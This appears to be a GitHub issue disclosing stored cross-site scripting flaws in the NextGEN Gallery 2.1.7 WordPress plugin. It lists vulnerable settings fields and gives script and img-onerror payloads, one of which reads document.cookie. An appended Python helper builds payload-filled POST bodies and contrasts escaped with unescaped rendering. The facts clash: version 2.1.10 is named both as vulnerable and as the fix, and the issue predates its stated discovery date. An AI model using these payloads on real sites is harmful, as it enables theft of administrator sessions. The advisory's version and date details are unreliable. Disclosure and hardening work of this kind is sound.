Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 #1

cybersecurityworks opened this issue Aug 27, 2015 · 0 comments

Details

WordPress Product Bug Report
Bug name: XSS (Cross-Site Scripting)
Software: NextGEN Gallery
Version: 2.1.7
Last updated: 12-08-2015
Homepage: https://wordpress.org/plugins/nextgen-gallery/download/
Compatible up to WordPress 4.3.0 (requires 3.6.1 or higher)
Severity: High
Description: Multiple stored XSS vulnerabilities in the WordPress plugin NextGEN Gallery: values saved on its settings pages are rendered back into wp-admin without escaping, so a stored script payload executes whenever the page is viewed.

Proof of concept (PoC)

Visit the following page on a site with this plugin installed: http://wordpresssite.com/wordpress/wp-admin/admin.php?page=nggallery-manage-gallery&mode=edit&gid=1&paged=1 . Set the path field (NextGEN Gallery by Photocrati, version 2.1.10) to the payload '></script><script>alert(document.cookie);</script> and save.

The stored payload then executes whenever the gallery is reviewed.

Note: the payloads were tested with unfiltered HTML disabled in wp-config.php via the setting below. That setting removes the unfiltered_html capability from every role, administrators included, so the stored markup is not explained by a user's legitimate ability to post raw HTML.

define( 'DISALLOW_UNFILTERED_HTML', true );

Issue 1:
Vulnerable URL: http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_display_settings
Method: POST
Vulnerable variables:
• photocrati-nextgen_basic_thumbnails[thumbnail_width]
• photocrati-nextgen_basic_thumbnails[thumbnail_height]
• photocrati-nextgen_basic_thumbnails[template]
• photocrati-nextgen_basic_imagebrowser[template]
• photocrati-nextgen_basic_singlepic[template]
• photocrati-nextgen_basic_compact_album[template]
• photocrati-nextgen_basic_compact_album[thumbnail_width]
• photocrati-nextgen_basic_compact_album[thumbnail_height]
• photocrati-nextgen_basic_extended_album[template]
• photocrati-nextgen_basic_extended_album[thumbnail_width]
• photocrati-nextgen_basic_extended_album[thumbnail_height]


Figure 1: HTTP Request & response for the vulnerable variable photocrati-nextgen_basic_thumbnails[thumbnail_width]


Issue 2:
Vulnerable URL: http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_other_options
Method: POST
Vulnerable variables:
• thumbnail_settings[thumbwidth]
• thumbnail_settings[thumbheight]
• watermark_options[wmXpos]
• watermark_options[wmYpos]


Figure 2: HTTP Request & response for the vulnerable variable thumbnail_settings[thumbwidth]


Figure 3: XSS response executed in browser


Reproducing steps

  1. Log in to a WordPress site (localhost or public host) that has the plugin installed.
  2. Open the settings pages listed above in NextGEN Gallery by Photocrati version 2.1.7 (the current release at the time of testing) and edit the variables named there.
  3. Fill each variable with the payload "><img src=x onerror=prompt(1)> and save.
  4. The stored payload now executes whenever the settings page is viewed again.
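The procedure above, as an added offline helper that is not part of the original advisory and not the plugin's own code. It builds the POST bodies a tester would submit for the fields listed under Issue 1 and Issue 2, classifies a captured wp-admin response as "raw" (payload reflected unescaped, the behaviour reported here), "escaped" or "absent", and contrasts an unescaped attribute render with the escaped render plus the integer validation a width/height field should receive. The HTML responses are constructed samples; the hostname is the advisory's placeholder, and the WordPress nonce the real form carries is not modelled.

```python
"""Added example for the NextGEN Gallery settings XSS described above.

Not part of the original advisory or of the plugin. Builds the POST bodies
a tester submits for the listed fields, classifies a captured wp-admin
response as vulnerable or escaped, and contrasts an unescaped attribute
render (the reported behaviour) with an escaped one. All HTML here is a
constructed sample, not real plugin output."""
import html
from urllib.parse import urlencode

# Payload from the reproducing steps above.
PAYLOAD = '"><img src=x onerror=prompt(1)>'

# Field names exactly as listed in Issue 1 and Issue 2 of the advisory.
DISPLAY_SETTINGS_FIELDS = [
    "photocrati-nextgen_basic_thumbnails[thumbnail_width]",
    "photocrati-nextgen_basic_thumbnails[thumbnail_height]",
    "photocrati-nextgen_basic_thumbnails[template]",
    "photocrati-nextgen_basic_imagebrowser[template]",
    "photocrati-nextgen_basic_singlepic[template]",
    "photocrati-nextgen_basic_compact_album[template]",
    "photocrati-nextgen_basic_compact_album[thumbnail_width]",
    "photocrati-nextgen_basic_compact_album[thumbnail_height]",
    "photocrati-nextgen_basic_extended_album[template]",
    "photocrati-nextgen_basic_extended_album[thumbnail_width]",
    "photocrati-nextgen_basic_extended_album[thumbnail_height]",
]
OTHER_OPTIONS_FIELDS = [
    "thumbnail_settings[thumbwidth]",
    "thumbnail_settings[thumbheight]",
    "watermark_options[wmXpos]",
    "watermark_options[wmYpos]",
]

# Settings pages named in the advisory (placeholder hostname kept as written there).
TARGETS = {
    "http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_display_settings": DISPLAY_SETTINGS_FIELDS,
    "http://wordpresssite.com/wordpress/wp-admin/admin.php?page=ngg_other_options": OTHER_OPTIONS_FIELDS,
}


def build_post_body(fields, payload=PAYLOAD):
    """urlencoded body that sets every listed field to the payload.

    The WordPress nonce and the other form fields the page expects are not
    modelled; a real test copies them from the browser's own request."""
    return urlencode([(name, payload) for name in fields])


def reflection_state(response_html, payload=PAYLOAD):
    """'raw' if the payload comes back unescaped (vulnerable), 'escaped' if
    only its attribute-escaped form is present, 'absent' otherwise."""
    if payload in response_html:
        return "raw"
    if html.escape(payload, quote=True) in response_html:
        return "escaped"
    return "absent"


def render_setting_unsafe(name, value):
    """Constructed sample of the unescaped render the advisory reports:
    the stored value is interpolated straight into the value attribute."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_setting_escaped(name, value):
    """Hardened render: attribute-escape the value (what esc_attr() does in
    WordPress) so a stored quote cannot close the attribute."""
    return (f'<input type="text" name="{html.escape(name, quote=True)}" '
            f'value="{html.escape(str(value), quote=True)}">')


def sanitize_dimension(value, default=100):
    """Width/height fields should never hold markup at all: accept only a
    positive integer, like WordPress's absint(), otherwise fall back."""
    try:
        n = int(str(value).strip())
    except ValueError:
        return default
    return n if n > 0 else default


def classify_targets(responses):
    """Map each target URL to the reflection state of its captured response."""
    return {url: reflection_state(body) for url, body in responses.items()}


if __name__ == "__main__":
    field = DISPLAY_SETTINGS_FIELDS[0]
    print(build_post_body(DISPLAY_SETTINGS_FIELDS)[:80], "...")
    for render in (render_setting_unsafe, render_setting_escaped):
        page = render(field, PAYLOAD)
        print(reflection_state(page), page)
    print(sanitize_dimension(PAYLOAD), sanitize_dimension("150"))
```

The two checks complement each other: the escaped render stops the payload breaking out of the attribute, and the integer validation means the numeric fields never store attacker markup in the first place, so a later template that forgets to escape has nothing dangerous to print.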

Timeline
31-08-2015 – Discovered in NextGEN Gallery 2.1.7
31-08-2015 – Reported to the WordPress plugin team
01-09-2015 – Fixed in NextGEN Gallery 2.1.10


Discovered by:
Sathish from Cyber Security Works Pvt Ltd

@cybersecurityworks cybersecurityworks changed the title Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 test Sep 1, 2015
Repository owner locked and limited conversation to collaborators Sep 1, 2015
Repository owner unlocked this conversation Sep 14, 2015
@cybersecurityworks cybersecurityworks changed the title test Multiple XSS in NextGEN Gallery by Photocrati Version 2.1.7 Sep 14, 2015